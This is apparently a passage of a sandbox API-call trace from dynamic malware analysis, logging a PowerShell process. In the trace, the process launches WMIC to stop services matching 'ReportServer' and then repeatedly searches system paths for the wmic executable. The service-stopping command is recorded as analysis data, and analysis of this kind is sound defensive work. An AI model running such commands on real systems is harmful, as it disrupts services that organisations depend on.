CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0244.881] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c82e000*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3133768 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice", lpProcessInformation=0x3133768*(hProcess=0x598, hThread=0x594, dwProcessId=0xa88, dwThreadId=0x730)) returned 1 [0244.888] CoTaskMemFree (pv=0x253f20) [0244.888] CloseHandle (hObject=0x594) returned 1 [0244.888] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0244.888] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c82e0a8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c82e0a8) returned 0x4550 [0244.889] CoTaskMemFree (pv=0x1b9b1010) [0244.889] GetCurrentProcess () returned 0xffffffffffffffff [0244.889] GetCurrentProcess () returned 0xffffffffffffffff [0244.889] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x598, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c82e188, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c82e188*=0x594) returned 1 [0245.715] CloseHandle (hObject=0x594) returned 1 [0245.716] GetExitCodeProcess (in: hProcess=0x598, lpExitCode=0x1c82e1f8 | out: lpExitCode=0x1c82e1f8*=0x0) returned 1 [0245.716] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0245.717] CloseHandle (hObject=0x598) returned 1 [0245.718] SetEvent (hEvent=0x564) returned 1 [0245.718] SetEvent (hEvent=0x558) returned 1 [0245.718] SetEvent (hEvent=0x55c) returned 1 [0245.718] SetEvent (hEvent=0x560) returned 1 [0245.718] SetEvent (hEvent=0x574) returned 1 [0245.718] SetEvent (hEvent=0x568) returned 1 [0245.718] SetEvent (hEvent=0x56c) returned 1 [0245.718] SetEvent (hEvent=0x570) returned 1 [0245.718] SetEvent (hEvent=0x578) returned 1 [0245.718] CoUninitialize () Thread: id = 166 os_tid = 0xb94 [0245.788] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0245.790] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0245.790] VirtualQuery (in: lpAddress=0x1c92d2a0, lpBuffer=0x1c92e160, dwLength=0x30 | out: lpBuffer=0x1c92e160*(BaseAddress=0x1c92d000, AllocationBase=0x1bfa0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0245.792] VirtualQuery (in: lpAddress=0x1c92d550, lpBuffer=0x1c92e410, dwLength=0x30 | out: lpBuffer=0x1c92e410*(BaseAddress=0x1c92d000, AllocationBase=0x1bfa0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0245.795] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0245.795] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0245.795] CoTaskMemFree (pv=0x2af7b0) [0245.795] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0245.795] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0245.795] CoTaskMemFree (pv=0x2af7b0) [0245.796] CoTaskMemAlloc (cb=0x20e) returned 0x2bc240 [0245.796] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bc240 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0245.796] CoTaskMemFree (pv=0x2bc240) [0245.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.796] SetErrorMode (uMode=0x1) returned 0x1 [0245.796] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.797] SetErrorMode (uMode=0x1) returned 0x1 [0245.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.797] SetErrorMode (uMode=0x1) returned 0x1 [0245.797] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.797] SetErrorMode (uMode=0x1) returned 0x1 [0245.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.798] SetErrorMode (uMode=0x1) returned 0x1 [0245.798] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.798] SetErrorMode (uMode=0x1) returned 0x1 [0245.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.798] SetErrorMode (uMode=0x1) returned 0x1 [0245.798] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.799] SetErrorMode (uMode=0x1) returned 0x1 [0245.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.799] SetErrorMode (uMode=0x1) returned 0x1 [0245.799] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.799] SetErrorMode (uMode=0x1) returned 0x1 [0245.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.800] SetErrorMode (uMode=0x1) returned 0x1 [0245.800] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.800] SetErrorMode (uMode=0x1) returned 0x1 [0245.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.800] SetErrorMode (uMode=0x1) returned 0x1 [0245.800] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.801] SetErrorMode (uMode=0x1) returned 0x1 [0245.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.801] SetErrorMode (uMode=0x1) returned 0x1 [0245.801] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.802] SetErrorMode (uMode=0x1) returned 0x1 [0245.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.802] SetErrorMode (uMode=0x1) returned 0x1 [0245.802] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.802] SetErrorMode (uMode=0x1) returned 0x1 [0245.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.802] SetErrorMode (uMode=0x1) returned 0x1 [0245.803] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.803] SetErrorMode (uMode=0x1) returned 0x1 [0245.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.803] SetErrorMode (uMode=0x1) returned 0x1 [0245.803] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.803] SetErrorMode (uMode=0x1) returned 0x1 [0245.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.804] SetErrorMode (uMode=0x1) returned 0x1 [0245.804] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.804] SetErrorMode (uMode=0x1) returned 0x1 [0245.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.804] SetErrorMode (uMode=0x1) returned 0x1 [0245.804] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.805] SetErrorMode (uMode=0x1) returned 0x1 [0245.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.805] SetErrorMode (uMode=0x1) returned 0x1 [0245.805] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.805] SetErrorMode (uMode=0x1) returned 0x1 [0245.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0245.806] SetErrorMode (uMode=0x1) returned 0x1 [0245.806] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.806] SetErrorMode (uMode=0x1) returned 0x1 [0245.806] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.806] SetErrorMode (uMode=0x1) returned 0x1 [0245.806] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.807] SetErrorMode (uMode=0x1) returned 0x1 [0245.807] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.807] SetErrorMode (uMode=0x1) returned 0x1 [0245.807] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.807] SetErrorMode (uMode=0x1) returned 0x1 [0245.808] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.808] SetErrorMode (uMode=0x1) returned 0x1 [0245.808] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.808] SetErrorMode (uMode=0x1) returned 0x1 [0245.808] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.808] SetErrorMode (uMode=0x1) returned 0x1 [0245.809] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.809] SetErrorMode (uMode=0x1) returned 0x1 [0245.809] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.809] SetErrorMode (uMode=0x1) returned 0x1 [0245.809] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.809] SetErrorMode (uMode=0x1) returned 0x1 [0245.810] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.810] SetErrorMode (uMode=0x1) returned 0x1 [0245.810] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.810] SetErrorMode (uMode=0x1) returned 0x1 [0245.810] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.810] SetErrorMode (uMode=0x1) returned 0x1 [0245.811] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.811] SetErrorMode (uMode=0x1) returned 0x1 [0245.811] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.811] SetErrorMode (uMode=0x1) returned 0x1 [0245.811] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.812] SetErrorMode (uMode=0x1) returned 0x1 [0245.812] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.812] SetErrorMode (uMode=0x1) returned 0x1 [0245.812] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.812] SetErrorMode (uMode=0x1) returned 0x1 [0245.812] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.813] SetErrorMode (uMode=0x1) returned 0x1 [0245.813] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.813] SetErrorMode (uMode=0x1) returned 0x1 [0245.813] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.813] SetErrorMode (uMode=0x1) returned 0x1 [0245.813] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.813] SetErrorMode (uMode=0x1) returned 0x1 [0245.814] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.814] SetErrorMode (uMode=0x1) returned 0x1 [0245.814] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c92d480 | 